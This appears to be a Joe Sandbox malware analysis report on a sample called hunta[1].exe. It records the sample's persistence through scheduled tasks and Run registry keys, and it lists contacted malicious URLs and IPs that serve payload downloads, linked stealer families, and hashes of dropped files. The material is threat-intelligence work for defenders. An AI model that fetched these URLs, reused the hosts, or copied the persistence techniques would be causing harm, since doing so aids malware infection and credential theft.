http://www.lua.org	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarV	WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net/	WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net/d	WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.spaceblue.com	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://www.winimage.com/zLibDll	hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp	false	URL Reputation: safe	unknown
http://www.baanboard.com	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar5	WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.develop.comDeepak	SciTE.exe.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net/O	WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarC:	WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarc	WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarfC:	WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false
193.233.132.62	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480972
Start date and time:	2024-07-25 02:15:30 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hunta[1].exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@28/31@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: hunta[1].exe

Simulations

Behavior and APIs

Time	Type	Description
02:16:33	Task Scheduler	Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
02:16:33	Task Scheduler	Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
02:16:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
02:16:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
20:16:42	API Interceptor	1x Sleep call for process: WerFault.exe modified
20:16:58	API Interceptor	3652178x Sleep call for process: hunta[1].exe modified
20:17:05	API Interceptor	5503x Sleep call for process: MPGPH131.exe modified
20:17:20	API Interceptor	4402279x Sleep call for process: RageMP131.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Fantom.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	fax_390392029_072514.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exe	Get hash	malicious	Bdaejec, SystemBC	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Endermanch@SecurityDefener2015.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
193.233.132.62	SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.580.27252.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	9iz0QM9rMM.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	4fMLTRkOfB.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	q7a5JOlhLZ.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	7jv1U7CgKF.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Fantom.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	fax_390392029_072514.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exe	Get hash	malicious	Bdaejec, SystemBC	Browse	44.221.84.105
	F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@SecurityDefener2015.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Fantom.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	fax_390392029_072514.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exe	Get hash	malicious	Bdaejec, SystemBC	Browse	44.221.84.105
	F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Endermanch@SecurityDefener2015.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
FREE-NET-ASFREEnetEU	External Own 4.20.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	147.45.47.64
	Aquantia_Setup 2.11.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	147.45.47.64
	AdobeUpdaterV131.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	193.233.132.62
	installer.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	147.45.47.81
	92.249.48.47-skid.arm7-2024-07-20T09_04_19.elf	Get hash	malicious	Mirai, Moobot	Browse	147.45.93.156
	conhost.exe	Get hash	malicious	Xmrig	Browse	147.45.47.81
	http://premium.davidabostic.com	Get hash	malicious	Unknown	Browse	147.45.78.74
	Software1.30.1.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81
	arm7.elf	Get hash	malicious	Mirai	Browse	147.45.45.222
	SecuriteInfo.com.Win32.RATX-gen.28387.25625.exe	Get hash	malicious	PureLog Stealer	Browse	193.233.203.218

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse
	FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exe	Get hash	malicious	Bdaejec	Browse
	Fantom.exe	Get hash	malicious	Bdaejec	Browse
	FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exe	Get hash	malicious	Bdaejec	Browse
	fax_390392029_072514.exe	Get hash	malicious	Bdaejec	Browse
	F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exe	Get hash	malicious	Bdaejec, RedLine	Browse
	F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse
	F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exe	Get hash	malicious	Bdaejec, SystemBC	Browse
	F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exe	Get hash	malicious	Bdaejec	Browse
	Endermanch@SecurityDefener2015.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.58967128255197
Encrypted:	false
SSDEEP:	384:1F6SsXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:rMQGPL4vzZq2o9W7GsxBbPr
MD5:	E8926E518D702E273E23516D8095607C
SHA1:	FE600523DC305BF668C28829A0E2E5711CC18460
SHA-256:	4DF0F8817D5F10C39D7941B5DB21F1457CE7FC92E5EEAD84277CD38A670C57B2
SHA-512:	4840992977A24241331CD3C5BDB1FA8E3FBF823799FFB9B6DDACBBFF817F636FCCABC93944C2C1351DDC1857D6DE251BDFFD7FD257104FC96B265B7E95422363
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731347122097384
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	3567D7F256250BA60139D64E5CDDADF1
SHA1:	E503F11EF88B81D385A437A49C7001F4218E5864
SHA-256:	9BDB458C748BDA278A4ACD28DBDE9BA4B156C84918453F9BDD2FBE348DA1925A
SHA-512:	6E00EFEB5DED926B862642C9CC32A25DB893DEB5619B8CAC5B956CF02E2B4BCFD3B61AFE5C5EC85B1116139EE70F636E6B0631D9A38AC449C3050BBBE3BA05A4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.36643340440386
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdkmQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdk9GCq2iW7z
MD5:	9D6E2B1583434773B6F38FD7774FC286
SHA1:	758F5D46E3C5B52C79928B954E8B5987DFA24E8C
SHA-256:	2AC225783B5E4A0644252482C2C6333E741CB26D4E47162469F092D6FEE7612C
SHA-512:	918D68A5558C121CB74B50FD482A7ACF9CF7C9AC388A16C7A0A634C3AC74E70D810011287F32735B2AE77776CEAE1A884F766DA0049B045E2817F84F90CC3C01
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe

Download File

Process:	C:\Users\user\Desktop\hunta[1].exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2383872
Entropy (8bit):	7.92928937448595
Encrypted:	false
SSDEEP:	49152:QSPmGpG0CTiBOGt/tP0HtQ0dcMjXyMxB/x5UGn77l7G4bo8jqOs8DoV:bPmG8HTiVtWQXqiMxVQaRGy3qOs8U
MD5:	651DE10CFAAA78BE50EDA9F3F0CE9EA7
SHA1:	6B922567FC5880E38FC9A3EACC24F6BAB3785731
SHA-256:	E5CB4F3F8D41C28116B9FF3253AB5F6D6736E18DA2D225CF15379954B2751643
SHA-512:	B3D038963134F43113831D929787AAC25E597E17E763C3955660E7D1ED63539C7A929A19A95AE306B390955FFCBAD89EB3857402BDE3159093AC43DFE9244446
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L......e...............".....,........[...........@..........................`[...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............................@... .P+.......... ..............@...gpsaqaiu......?......"..............@...zlufpcnd......Z.......#.............@....taggant.0....Z.."....#.............@......u...P....[..B....$............. ...................................................................................................................................................

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\hunta[1].exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WwKLWFk.exe_b61ee072982e165aa57f6461531a5f842ae835_ae33f148_4580b34d-0134-48d0-9aeb-c77ead72c8cd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.988089933376016
Encrypted:	false
SSDEEP:	96:fEFin5NbbLsAhnq7afzQXIDcQ3c6ytcEccw3zP+HbHg/5ksS/YyNl1zWDUMsxzLs:8k5NbbLa0JcmUj8fp9zuiFIZ24IO8k4
MD5:	5DC3627C6BBA322726BCAECEA42565BA
SHA1:	083501501971989D3FAF5A0CDF274E78CB31EA1C
SHA-256:	3CFE527B1D0F0635DAF0930FC6E80A9AF3FB070B5F4D333BCD4C1168BEA737D7
SHA-512:	0147433C695B3FF5939DC86CAF5E091354776ECD5D2A337387A618093A59A1E4106E2C584FFCF56B54A6072AA83F97B18057EF0FF8752F3B3127197342632A5C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.0.1.9.7.0.9.9.9.5.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.0.1.9.7.7.0.9.3.4.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.8.0.b.3.4.d.-.0.1.3.4.-.4.8.d.0.-.9.a.e.b.-.c.7.7.e.a.d.7.2.c.8.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.f.9.b.0.d.2.-.d.5.2.1.-.4.3.3.d.-.b.f.4.4.-.f.6.5.6.d.6.e.6.9.4.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.w.K.L.W.F.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.0.-.0.0.0.1.-.0.0.1.3.-.d.4.e.c.-.5.d.e.4.2.7.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.6.e.5.9.8.2.5.a.4.0.d.4.9.5.a.f.8.0.e.1.d.3.6.3.0.d.5.3.2.0.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.W.w.K.L.W.F.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88EA.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jul 25 00:16:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	154366
Entropy (8bit):	1.8974334253506935
Encrypted:	false
SSDEEP:	768:ezK5eRBVkuZOpTaZYzOTOezPb19sv/mv6uyN:e9KuY8ZqQzPb19sv/mv6uyN
MD5:	377F35EA96F4F0C0F56CE2C7E531AC56
SHA1:	87102723D9444709C47B17063D46D66B53BA4E43
SHA-256:	1AD0F7D27B90904D1BA6C97059B33803BFF058621B7F42478AD5E453310D1CC9
SHA-512:	D0B39011845A3FCE4851709B3FBCFCC14F573AA6AB7086B30ABBEB73BCD03BCF89801E557418A80B07CF39491A4B90998F1E03F63B53D8F1DC7F93CB1E01DF0B
Malicious:	false
Preview:	MDMP..a..... .......e..f............D...............X.......l.... ......$...VO..........`.......8...........T...........@>..............h!..........T#..............................................................................eJ.......#......GenuineIntel............T....... ...[..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A62.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8278
Entropy (8bit):	3.699765590623967
Encrypted:	false
SSDEEP:	192:R6l7wVeJ8y634e6YMG62gmf+/pD+89bNssfPGvm:R6lXJZ63Z6YN62gmf+tN/fX
MD5:	FE5B0CBC2288F8612483C6C3B014C6C9
SHA1:	5F442616697D13433DA889E14F46A534CDF5D40D
SHA-256:	F891E93668EE552957E2859D251FBFFD8195B81C0CC9FE7D4A3F570578DBEE87
SHA-512:	EB848908CE6B8D4AC87C62A4E179984A8B317E4232FAFEDDE01E5E322BA1F19B75D24DE1528721B8D61D97B1D70C1B34C8C9F7CD969CD629420A1A4DA01EFB19
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8AA1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4558
Entropy (8bit):	4.465464263066446
Encrypted:	false
SSDEEP:	48:cvIwWl8zs+Jg77aI9VaWpW8VYVYm8M4Ji/wFM+q8U/4aBkig6ud:uIjf0I7Tb7V9JiFd4Kvg6ud
MD5:	2478490B13AE38C86809D73B06B16046
SHA1:	B7DAEA54F63C5DEEA760E58531141F2CB00CB18C
SHA-256:	30FFA53B8FADFF3BB2178CDA61BA7C4C51F197314EA6F58F3F253C5DD96B6B46
SHA-512:	615216BB2DDB3B7F59E716C1A24EBBA232993A3ADA821FF26D6B4EDA13C91172D31E30D13BC3C9E7F8425E8D54ACD1B723235663167456002CC33B384BC35307
Malicious:	false
